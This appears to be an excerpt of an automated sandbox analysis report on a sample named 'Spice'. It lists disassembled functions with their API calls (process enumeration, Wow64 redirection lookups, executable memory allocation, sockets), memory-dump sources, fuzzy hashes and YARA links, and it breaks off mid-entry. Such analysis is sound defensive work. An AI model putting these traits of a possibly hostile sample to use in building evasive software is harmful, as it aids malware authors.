Instruction ID: 5a5893a65b83b3ff67efccb6aa442177629de26b2048cdd8aa5f88803c1c0a85
Opcode Fuzzy Hash: 4c3bca6e1f6c1eb543ece8fb680c9725634055a8a0d32c7beed7a74492402c9c
Instruction Fuzzy Hash: AC219F3260421DABDF218F54CC42FEE3BA9EB48724F121214FF557B190EAB1A8519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EF81B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EF826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EF827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EF8284

Strings

msctls_updown32, xrefs: 00EF81E9

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 5248cef47e29cc3289bada5552994fad8192c4bcd51dddb5fd429df0144adf61
Instruction ID: d1c69cbd11ea6d26522e32f021d6ef477c10afe81a56e8452b35f8c40667cabe
Opcode Fuzzy Hash: 5248cef47e29cc3289bada5552994fad8192c4bcd51dddb5fd429df0144adf61
Instruction Fuzzy Hash: 72216DB160420CAFEB10DF54CC85DB737EDEB4A368B181159FA05AB261CB71EC11DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EF72D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EF7360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EF7370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EF7395

Strings

Listbox, xrefs: 00EF732D

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: d01adafa503939bdcd205d0c2c178a8447c21513fcb213ac4eac1ae5b23edcf5
Instruction ID: 4ad775919391a77d03b02cdb32dbd771b48593c04252c0705af5c3581dc80579
Opcode Fuzzy Hash: d01adafa503939bdcd205d0c2c178a8447c21513fcb213ac4eac1ae5b23edcf5
Instruction Fuzzy Hash: 9221C23260511CBFDF118F54DC85FBF37AAEB89768F119124FE44AB190CA71AC51ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EF7D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EF7D97
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EF7DAC
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EF7DB9

Strings

msctls_trackbar32, xrefs: 00EF7D6E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: dea06ba8e313fea0f22d0371f4b00fdc47b51d5ffd0ac4e414ba1d5ec506cbc0
Instruction ID: a97e86e7f68de853cadaa196836c08f8735d761968ce48da594ffebd15a065b8
Opcode Fuzzy Hash: dea06ba8e313fea0f22d0371f4b00fdc47b51d5ffd0ac4e414ba1d5ec506cbc0
Instruction Fuzzy Hash: 0911E37224420CBADF209F64CC05FFB7BA9EF89B28F115118FB85B6090D672D851DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00E84BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E84AF7,?), ref: 00E84BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E84BCA

Strings

kernel32.dll, xrefs: 00E84BB3
Wow64RevertWow64FsRedirection, xrefs: 00E84BC4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 26fc1f47493c52542e8600effad9a988b4954c5fb6a23f897f21884f31cd4c33
Instruction ID: 29a23081ba1011b30f59daef5569c745b1b5ae701e16f06e6c205e7fe1725a02
Opcode Fuzzy Hash: 26fc1f47493c52542e8600effad9a988b4954c5fb6a23f897f21884f31cd4c33
Instruction Fuzzy Hash: 5FD0C2704003138FE3206F30DC0874672D4EF04344F009C2AD889D2590DE70C480D741

Uniqueness

Uniqueness Score: -1.00%

Function 00E84B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E84B44,?,00E849D4,?,?,00E827AF,?,00000001), ref: 00E84B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E84B97

Strings

kernel32.dll, xrefs: 00E84B80
Wow64DisableWow64FsRedirection, xrefs: 00E84B91

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: cf63951f820a2bb86d48a3546b48973443de406fbdd9867a2c487b1547dc2532
Instruction ID: d12b572ec6f37e55ce59509d5c2b8798e8644823cc8ef9c97d847886d7a58d9d
Opcode Fuzzy Hash: cf63951f820a2bb86d48a3546b48973443de406fbdd9867a2c487b1547dc2532
Instruction Fuzzy Hash: 45D017B05547238FD720AF75EC18B06B6E4AF05355F11982AD88AE2690EA70E880EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00EF1696), ref: 00EF1455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EF1467

Strings

advapi32.dll, xrefs: 00EF1450
RegDeleteKeyExW, xrefs: 00EF1461

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 5afa0fa2e923418fa9e20c0f4aba1d59097c39c479657826f24279d880b8e5d3
Instruction ID: b35c2772e7ad3759fc2288b5738e729be145bd6ca31a7e3d53b8b69e4ea74681
Opcode Fuzzy Hash: 5afa0fa2e923418fa9e20c0f4aba1d59097c39c479657826f24279d880b8e5d3
Instruction Fuzzy Hash: 81D0173051072ACFD7209F75D80971AB6E4AF56399F11C86A98E6E21A0EA70D8C0DA91

Uniqueness

Uniqueness Score: -1.00%

Function 00E855F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E85E3D), ref: 00E855FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E85610

Strings

GetNativeSystemInfo, xrefs: 00E8560A
kernel32.dll, xrefs: 00E855F9

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 60ee7b1bd8e1af4647ae3d01ecca076b9bd349c51e036788b8528144b96a5c1c
Instruction ID: b63c633c4a669d8e019664a17183829830bb0abe4183d5e38a96845d16cde201
Opcode Fuzzy Hash: 60ee7b1bd8e1af4647ae3d01ecca076b9bd349c51e036788b8528144b96a5c1c
Instruction Fuzzy Hash: D0D01775960B12DFE720AF35C808716B6E5AF05359F51982AD88AE2291EE70C880EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EE97CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00EE93DE,?,00F00980), ref: 00EE97D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EE97EA

Strings

kernel32.dll, xrefs: 00EE97D3
GetModuleHandleExW, xrefs: 00EE97E4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 348b1078cfcb9ca275536aaaa26216a303701616e999fee3fe25840929a83df1
Instruction ID: 1202ee33546cc335dc93fe5a1c76d167f7103c576c33906264999b705389cb95
Opcode Fuzzy Hash: 348b1078cfcb9ca275536aaaa26216a303701616e999fee3fe25840929a83df1
Instruction Fuzzy Hash: 31D017705607278FD7209F36E888706B6E4BF09395F11982ADC86E2290EF70D880EA52

Uniqueness

Uniqueness Score: -1.00%

Function 00EC7D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b595f8e3b60e30886ee54c59ee739643608bdddd803a384df398c9b1c99c67
Instruction ID: 17b2266dcc96e5aafd3346648ec0fbae7ed736666d63b077d13f2d29212995c2
Opcode Fuzzy Hash: 77b595f8e3b60e30886ee54c59ee739643608bdddd803a384df398c9b1c99c67
Instruction Fuzzy Hash: 89C17E75A00216EFDB14CF94CA84EAEB7B5FF48714B10959CE845EB251DB32ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EEE713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00EEE7A7
CharLowerBuffW.USER32(?,?), ref: 00EEE7EA

Part of subcall function 00EEDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EEDEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EEE9EA
_memmove.LIBCMT ref: 00EEE9FD

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 72587a620ceee0e103c644fad5b29a7fe719ee600096075bd78a087e5bf2e4f7
Instruction ID: 9cff6500aad21bf8030adb16c180e4fc837a040b765e4821dfecf122b2209d17
Opcode Fuzzy Hash: 72587a620ceee0e103c644fad5b29a7fe719ee600096075bd78a087e5bf2e4f7
Instruction Fuzzy Hash: CFC18971A08345CFC714DF29C48096ABBE4FF89718F04996EF899AB351D731E906CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00EE877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00EE87AD
CoUninitialize.OLE32 ref: 00EE87B8

Part of subcall function 00EFDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00EE8A0E,?,00000000), ref: 00EFDF71

VariantInit.OLEAUT32(?), ref: 00EE87C3
VariantClear.OLEAUT32(?), ref: 00EE8A94

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 7275d3d7a7e9f6ac811e58a0da5e1866815b3499eda6891d330ad612c3790dfe
Instruction ID: 9eb029d8e7915a14b43050169ffb7e716612a4ebae8b38ffd696ba049836e668
Opcode Fuzzy Hash: 7275d3d7a7e9f6ac811e58a0da5e1866815b3499eda6891d330ad612c3790dfe
Instruction Fuzzy Hash: 49A15675604B459FC710DF55C581B2AB7E5BF88314F049859FA9AAB3A2DB30ED00CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00EC814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F03C4C,?), ref: 00EC8308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F03C4C,?), ref: 00EC8320
CLSIDFromProgID.OLE32(?,?,00000000,00F00988,000000FF,?,00000000,00000800,00000000,?,00F03C4C,?), ref: 00EC8345
_memcmp.LIBCMT ref: 00EC8366

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 82bd0c5eb7f335567dda9328b5f66e51bcb3eba127eab462614ba129b6cc00e6
Instruction ID: 34e9bdaabc2950402e9e60fdab010c55521af2712ff6dcfacd56cfb91a1aa801
Opcode Fuzzy Hash: 82bd0c5eb7f335567dda9328b5f66e51bcb3eba127eab462614ba129b6cc00e6
Instruction Fuzzy Hash: DF812D71A00109EFCB04DF94CA88EEEB7B9FF89315F144559E505BB250DB71AE06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EC749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EC74AC
SysAllocString.OLEAUT32(00000000), ref: 00EC7555
VariantCopy.OLEAUT32 ref: 00EC7584
VariantClear.OLEAUT32(?), ref: 00EC75AB

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 630a8f8f7b1b8f651fdffef57a0757cb3b2c0c3d7dbcc89573a1a80e25742b9f
Instruction ID: 8ac332929b480d4d6f68616aa48fea8a82d441d938dbcaf2e7f09441173c3471
Opcode Fuzzy Hash: 630a8f8f7b1b8f651fdffef57a0757cb3b2c0c3d7dbcc89573a1a80e25742b9f
Instruction Fuzzy Hash: E651C630608B019BCB209F79D995F6DB7E4AF44314F20B81FE5D6E72A1EB7298428F05

Uniqueness

Uniqueness Score: -1.00%

Function 00EEF4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00EEF526
Process32FirstW.KERNEL32(00000000,?), ref: 00EEF534

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

Process32NextW.KERNEL32(00000000,?), ref: 00EEF5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EEF603

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 90253e416b91c8cb8464475aac20652fad7706eb4cb4734052ec12486af62ec2
Instruction ID: 9b619b40713f583a76b892d7cc9e367a27019a26302fbc3c79b58fd26b7b1a5a
Opcode Fuzzy Hash: 90253e416b91c8cb8464475aac20652fad7706eb4cb4734052ec12486af62ec2
Instruction Fuzzy Hash: DD519FB11043559FD320EF24DC81E6BB7E8EF94700F10592DF599E72A2EB70A905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00E9492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E949C0
__flush.LIBCMT ref: 00E949E0
__write.LIBCMT ref: 00E94A13
__flsbuf.LIBCMT ref: 00E94A41

Part of subcall function 00E98D58: __getptd_noexit.LIBCMT ref: 00E98D58

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: e162fea597933abdcd832b5cbbc0f0b194a6c8fa802285d4f195cc22fe2c4c37
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: 9C41D6B170070A9BDF288E69C880DAF77A5AF81364B24917DE855A76D0F770DE428B44

Uniqueness

Uniqueness Score: -1.00%

Function 00ECA638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00ECA68A
__itow.LIBCMT ref: 00ECA6BB

Part of subcall function 00ECA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00ECA976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00ECA724
__itow.LIBCMT ref: 00ECA77B

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 55e3f69ab311cb7b846fa1cfa9d821d3a1fa752a8e3caf27f49390b3f201ad3b
Instruction ID: a94f710372a6d7dd91b34ae59441df2680c5d12c5a82e06713731632a27d3977
Opcode Fuzzy Hash: 55e3f69ab311cb7b846fa1cfa9d821d3a1fa752a8e3caf27f49390b3f201ad3b
Instruction Fuzzy Hash: EF416E74A0020CABDF11EF54C946FEE7BB9AF44754F08106DF909B3291DB719946CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EE7095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00EE70BC
WSAGetLastError.WSOCK32(00000000), ref: 00EE70CC

Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EE7130
WSAGetLastError.WSOCK32(00000000), ref: 00EE713C

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 2387b1debe6168816e4b0fd14eaab1687eb1ac64fd6b0c73ce0876801d616994
